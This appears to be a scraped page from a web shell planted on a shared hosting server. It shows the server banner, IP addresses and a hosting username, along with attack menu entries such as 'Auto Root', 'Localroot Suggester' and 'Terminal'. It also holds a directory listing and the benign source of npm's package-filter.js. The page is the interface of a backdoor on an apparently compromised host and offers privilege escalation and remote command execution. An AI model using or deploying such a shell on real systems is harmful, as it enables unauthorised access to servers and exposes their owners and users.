Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 18.117.229.144
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
node_modules /
npm /
lib /
search /
Delete
Unzip
Name
Size
Permission
Date
Action
all-package-metadata.js
11.75
KB
-rw-r--r--
2021-03-10 14:36
all-package-search.js
1.52
KB
-rw-r--r--
2021-03-10 14:36
format-package-stream.js
4.25
KB
-rw-r--r--
2021-03-10 14:36
package-filter.js
1.18
KB
-rw-r--r--
2021-03-10 14:36
Save
Rename
'use strict' module.exports = filter function filter (data, include, exclude, opts) { return typeof data === 'object' && filterWords(data, include, exclude, opts) } function getWords (data, opts) { return [ data.name ] .concat((opts && opts.description) ? data.description : []) .concat((data.maintainers || []).map(function (m) { return '=' + m.name })) .concat(data.versions && data.versions.length && data.url && ('<' + data.url + '>')) .concat(data.keywords || []) .map(function (f) { return f && f.trim && f.trim() }) .filter(function (f) { return f }) .join(' ') .toLowerCase() } function filterWords (data, include, exclude, opts) { var words = getWords(data, opts) for (var i = 0, l = include.length; i < l; i++) { if (!match(words, include[i])) return false } for (i = 0, l = exclude.length; i < l; i++) { if (match(words, exclude[i])) return false } return true } function match (words, pattern) { if (pattern.charAt(0) === '/') { pattern = pattern.replace(/\/$/, '') pattern = new RegExp(pattern.substr(1, pattern.length - 1)) return words.match(pattern) } return words.indexOf(pattern) !== -1 }